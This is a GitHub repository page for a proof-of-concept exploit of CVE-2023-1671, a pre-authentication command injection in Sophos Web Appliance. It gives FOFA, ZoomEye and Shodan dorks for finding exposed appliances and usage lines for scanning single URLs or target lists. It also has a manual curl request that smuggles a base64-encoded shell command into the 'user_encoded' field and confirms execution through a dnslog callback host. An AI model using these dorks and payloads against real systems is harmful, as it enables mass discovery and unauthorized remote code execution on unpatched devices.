Skip to content

W01fh4cker/CVE-2023-1671-POC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

Dork

fofa

(title="Sophos Web Appliance" || app="Sophos-Web-Appliance") && title!="Sophos Web Appliance:错误请求"

ZoomEye

title:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request"

Shodan

title:"Sophos Web Appliance"

Usage

python CVE-2023-1671-POC.py -u http://www.example.com
python CVE-2023-1671-POC.py -u http://www.example.com -d xxxxxx.dnslog.cn

python CVE-2023-1671-POC.py -f urls.txt
python CVE-2023-1671-POC.py -f urls.txt -d xxxxxx.dnslog.cn

or without this script file:

echo -n "';ping xxxxx.dnslog.cn -c 3 #" | base64
# JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM=  --> JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM
curl -k --trace-ascii % "http://www.example.com/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=12345&filetype=12345&user=12345&user_encoded=JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM"

Reference

Analysis of Pre-Auth RCE in Sophos Web Appliance (CVE-2023-1671) - Blog - VulnCheck

About

CVE-2023-1671-POC, based on dnslog platform

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages